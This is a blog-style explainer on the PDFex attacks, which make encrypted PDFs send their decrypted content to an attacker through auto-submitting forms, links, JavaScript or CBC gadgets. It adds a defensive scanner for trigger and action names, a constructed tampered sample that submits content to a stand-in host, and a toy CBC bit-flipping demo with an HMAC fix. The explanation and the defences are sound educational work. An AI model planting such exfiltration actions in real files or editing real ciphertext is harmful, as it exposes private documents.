Researchers Find New Hack To Read Content Of Password Protected PDF Files

Looking for ways to unlock and read the content of a password-protected or encrypted PDF file without knowing the password?

Well, that's now possible, thanks to a set of attack techniques that could allow attackers to access the entire content of a password-protected or encrypted PDF file.

Dubbed PDFex, the new techniques include two classes of attacks that take advantage of a vulnerability in the standard encryption protection built into the PDF (Portable Document Format). PDFex doesn't allow an attacker to learn or remove the password for an encrypted PDF file. But it allows an attacker to remotely exfiltrate content once a legitimate user opens that PDF file.

In other words, a PDFex attack allows attackers to modify a password-protected or encrypted PDF file, without having the corresponding password, in such a way that when it is opened by someone with the correct password, the file automatically sends a copy of the decrypted content to a remote attacker.

PDFex was tested against 27 desktop and web PDF viewers, such as Adobe Acrobat, Foxit Reader, Evince, Nitro Reader, Okular, and the built-in PDF viewers of Chrome, Firefox, Safari, and Opera. All of the tested PDF viewers were found vulnerable.

It is important to note that the attack is targeting the encryption supported by the PDF (Portable Document Format) standard, not external applications.

PDFex Attacks Exploit Two PDF Vulnerabilities

PDFex attacks rely on two major vulnerabilities:

1. Partial Encryption

The standard PDF specification supports partial encryption by design: only strings and streams are encrypted, while the objects defining the PDF file's structure remain unencrypted.

Thus, support for the mixing of plaintexts with ciphertexts leaves an opportunity for attackers to easily manipulate the file structure and inject a malicious payload into it.

2. Ciphertext Malleability

PDF encryption uses the CBC (Cipher Block Chaining) encryption mode with no integrity checks, which attackers can use to create self-exfiltrating ciphertext parts.

PDFex Attack Classes: Direct Exfiltration and CBC Gadgets

Now, let's understand the two classes of PDFex attacks.

Class A : Direct Exfiltration

It takes advantage of the partial encryption feature of a password-protected PDF file (meaning the entire PDF file is not encrypted and some parts are left unencrypted).

Thus, an attacker can modify the unencrypted fields, add unencrypted objects, and create a trapped PDF file that, when decrypted and opened, will attempt to send the file's content to an attacker.

This can be achieved in three ways:

1. By modifying a PDF file's unencrypted data to add a PDF form that auto submits the PDF's content to an attacker's server when the victim decrypts and opens an encrypted PDF file.

2. By modifying a PDF file's unencrypted data to add a link that automatically triggers when the victim decrypts and opens an encrypted PDF file.

3. By modifying a PDF file's unencrypted data to add JavaScript code that automatically runs when the victim decrypts and opens an encrypted PDF file.

Of the three ways, the first one is the easiest to perform and the most efficient, as it doesn't require user interaction. The second one requires opening an external browser, and the user could prevent this. The third one is the least reliable method because many PDF apps limit JavaScript (JS) support due to the security risks of having PDF files run JS code in the background.

As shown in the picture, the object which contains the link (in blue color) for form submission is not encrypted and completely controlled by an attacker.
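For defenders, the three routes above all leave a trace in the unencrypted structure. The following triage check is an added example, not code from the researchers or the original post; the sample fragments, the `.example` URL and the function names are constructed for illustration.

```python
import re

AUTO_TRIGGERS = ("/OpenAction", "/AA")                 # run without a click
ACTION_TYPES = ("/SubmitForm", "/URI", "/JavaScript")  # the three routes above

def plaintext_structure(data: bytes) -> bytes:
    """Drop stream bodies; in an encrypted file they are ciphertext, not structure."""
    return re.sub(rb"stream\r?\n.*?endstream", b"stream endstream", data, flags=re.S)

def has_name(name: str, data: bytes) -> bool:
    # Match the whole PDF name, so /AA does not match a longer name.
    # Names written with #xx escapes are not decoded (a limit of this sketch).
    return re.search(re.escape(name.encode()) + rb"(?![0-9A-Za-z])", data) is not None

def triage(data: bytes) -> dict:
    s = plaintext_structure(data)
    report = {
        "encrypted": has_name("/Encrypt", s),
        "auto_triggers": [n for n in AUTO_TRIGGERS if has_name(n, s)],
        "actions": [n for n in ACTION_TYPES if has_name(n, s)],
        "urls": [u.decode("latin-1") for u in re.findall(rb"\((https?://[^)\s]+)\)", s)],
    }
    # Encrypted file + automatic trigger + outbound action in plaintext: review it.
    report["review"] = bool(report["encrypted"] and report["auto_triggers"] and report["actions"])
    return report

# Constructed fragments, not real documents. The stream body holds bytes that
# merely look like a name, to show why ciphertext is excluded from the scan.
CLEAN = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
4 0 obj << /Length 16 >> stream
\x8f\x02/OpenAction\x11\x90
endstream endobj
trailer << /Root 1 0 R /Encrypt 9 0 R >>
"""
TAMPERED = CLEAN.replace(
    b"/Pages 2 0 R",
    b"/Pages 2 0 R /OpenAction << /S /SubmitForm /F (http://collector.example/x) >>")
```

A `review` hit is a reason to inspect the file, not proof of tampering, and objects packed inside object streams are outside what this check sees.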

Class B : CBC Gadgets

CBC gadgets mean that the ciphertext is modified to exfiltrate itself after decryption.

Not all PDF viewers support partially encrypted documents, but many of them also don't have file integrity protection, which allows attackers to modify the unencrypted data directly within an encrypted object.

The attack scenario for CBC gadgets is almost the same as for the Direct Exfiltration attacks. The only difference is that here the attacker modifies the existing encrypted content (after a user opens the encrypted PDF file) or creates new content from CBC gadgets to add actions that define how to exfiltrate data.

Besides this, if a PDF file contains compressed streams to reduce the file size, attackers need to use half-open object streams to steal the data.

An attacker can use a CBC gadget to modify the encrypted content so that they create trapped PDF files that submit their own content to remote servers via PDF forms or URLs.
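Why CBC without an integrity check is malleable, and how an authentication tag closes the gap, shown as an added example that is not from the researchers or the original post. It covers both the ciphertext malleability point and the CBC gadget description above. Assumptions: a toy Feistel cipher stands in for AES so the block runs on the standard library alone, and encrypt-then-MAC with HMAC is a generic mitigation, not something the PDF specification defines.

```python
import hashlib, hmac, os
BLOCK = 16

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def round_f(key: bytes, i: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]

def enc_block(key, b):  # toy 4-round Feistel standing in for AES (assumption)
    l, r = b[:8], b[8:]
    for i in range(4):
        l, r = r, xor(l, round_f(key, i, r))
    return l + r

def dec_block(key, b):
    l, r = b[:8], b[8:]
    for i in reversed(range(4)):
        l, r = xor(r, round_f(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):  # pt must be a multiple of BLOCK; padding omitted
    out = [iv]
    for i in range(0, len(pt), BLOCK):
        out.append(enc_block(key, xor(pt[i:i + BLOCK], out[-1])))
    return b"".join(out)

def cbc_decrypt(key, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(dec_block(key, c), prev) for prev, c in zip(blocks, blocks[1:]))

def seal(enc_key, mac_key, iv, pt):  # encrypt-then-MAC over IV + ciphertext
    ct = cbc_encrypt(enc_key, iv, pt)
    return ct + hmac.new(mac_key, ct, hashlib.sha256).digest()

def open_sealed(enc_key, mac_key, blob):  # returns None if the tag does not verify
    ct, tag = blob[:-32], blob[-32:]
    ok = hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha256).digest())
    return cbc_decrypt(enc_key, ct) if ok else None

def demo():
    k, mk, iv = os.urandom(16), os.urandom(16), os.urandom(16)
    known, wanted = b"KNOWN-PLAINTEXT!", b"CHOSEN-BY-EDITOR"  # constructed blocks
    pt, delta = known + b"second block ...", xor(known, wanted)
    ct, blob = cbc_encrypt(k, iv, pt), seal(k, mk, iv, pt)
    flip = lambda data: xor(data[:BLOCK], delta) + data[BLOCK:]  # edit IV only, no key
    return {"plain_cbc": cbc_decrypt(k, flip(ct)),
            "sealed": open_sealed(k, mk, flip(blob)),
            "roundtrip": open_sealed(k, mk, blob) == pt}
```

With plain CBC the edited first block decrypts cleanly to the substituted text; with the tag in place the same edit is rejected before any decryption happens.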

Among 27 widely used desktop and web PDF viewers, all of them are vulnerable to at least one of those attacks.

All of these attacks require that an attacker is in a position to modify encrypted PDF files. This includes being able to intercept the user's network traffic or having physical access to a storage system.

PDFex is a major vulnerability in the PDF standard and this must be fixed in future PDF specifications.

For more details of the PDFex attacks, you can go to the website released by the researchers and the research paper titled "Practical Decryption exFiltration: Breaking PDF Encryption."

I hope you find useful information in this article. If you have any questions then please mention in the comments section and I will get back to you and stay tuned with my blog to learn interesting things related to cybersecurity and hacking.

